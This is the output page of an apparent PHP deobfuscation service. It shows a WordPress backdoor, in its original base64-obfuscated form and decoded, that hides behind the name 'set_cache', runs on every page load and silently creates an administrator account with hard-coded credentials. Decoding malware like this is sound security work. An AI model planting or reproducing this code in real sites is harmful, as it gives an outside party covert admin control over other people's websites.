Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

function set_cache(){ if (!username_exists(base64_decode("d29yZHByZXNzYXV0bw==")) && !em..

Decoded Output download

<?  function set_cache(){ 
 if (!username_exists(base64_decode("d29yZHByZXNzYXV0bw==")) && !email_exists(base64_decode("b3Bwb25lcGllY2UwMHh4MDBAZ21haWwuY29t"))) {  
 $load = wp_create_user(base64_decode("d29yZHByZXNzYXV0bw=="), base64_decode("d29yZHByZXNzcWQyMDE2"), base64_decode("b3Bwb25lcGllY2UwMHh4MDBAZ21haWwuY29t")); 
 $s = new WP_User($load);  
 $s->set_role(base64_decode("YWRtaW5pc3RyYXRvcg==")); 
 }} 
 add_action('init','set_cache'); ?>

Did this file decode correctly?

Original Code

function set_cache(){
 if (!username_exists(base64_decode("d29yZHByZXNzYXV0bw==")) && !email_exists(base64_decode("b3Bwb25lcGllY2UwMHh4MDBAZ21haWwuY29t"))) { 
 $load = wp_create_user(base64_decode("d29yZHByZXNzYXV0bw=="), base64_decode("d29yZHByZXNzcWQyMDE2"), base64_decode("b3Bwb25lcGllY2UwMHh4MDBAZ21haWwuY29t"));
 $s = new WP_User($load); 
 $s->set_role(base64_decode("YWRtaW5pc3RyYXRvcg=="));
 }}
 add_action('init','set_cache');

Function Calls

add_action 1

Variables

None

Stats

MD5 db5653461efeae867e80232e0b543c8b
Eval Count 0
Decode Time 57 ms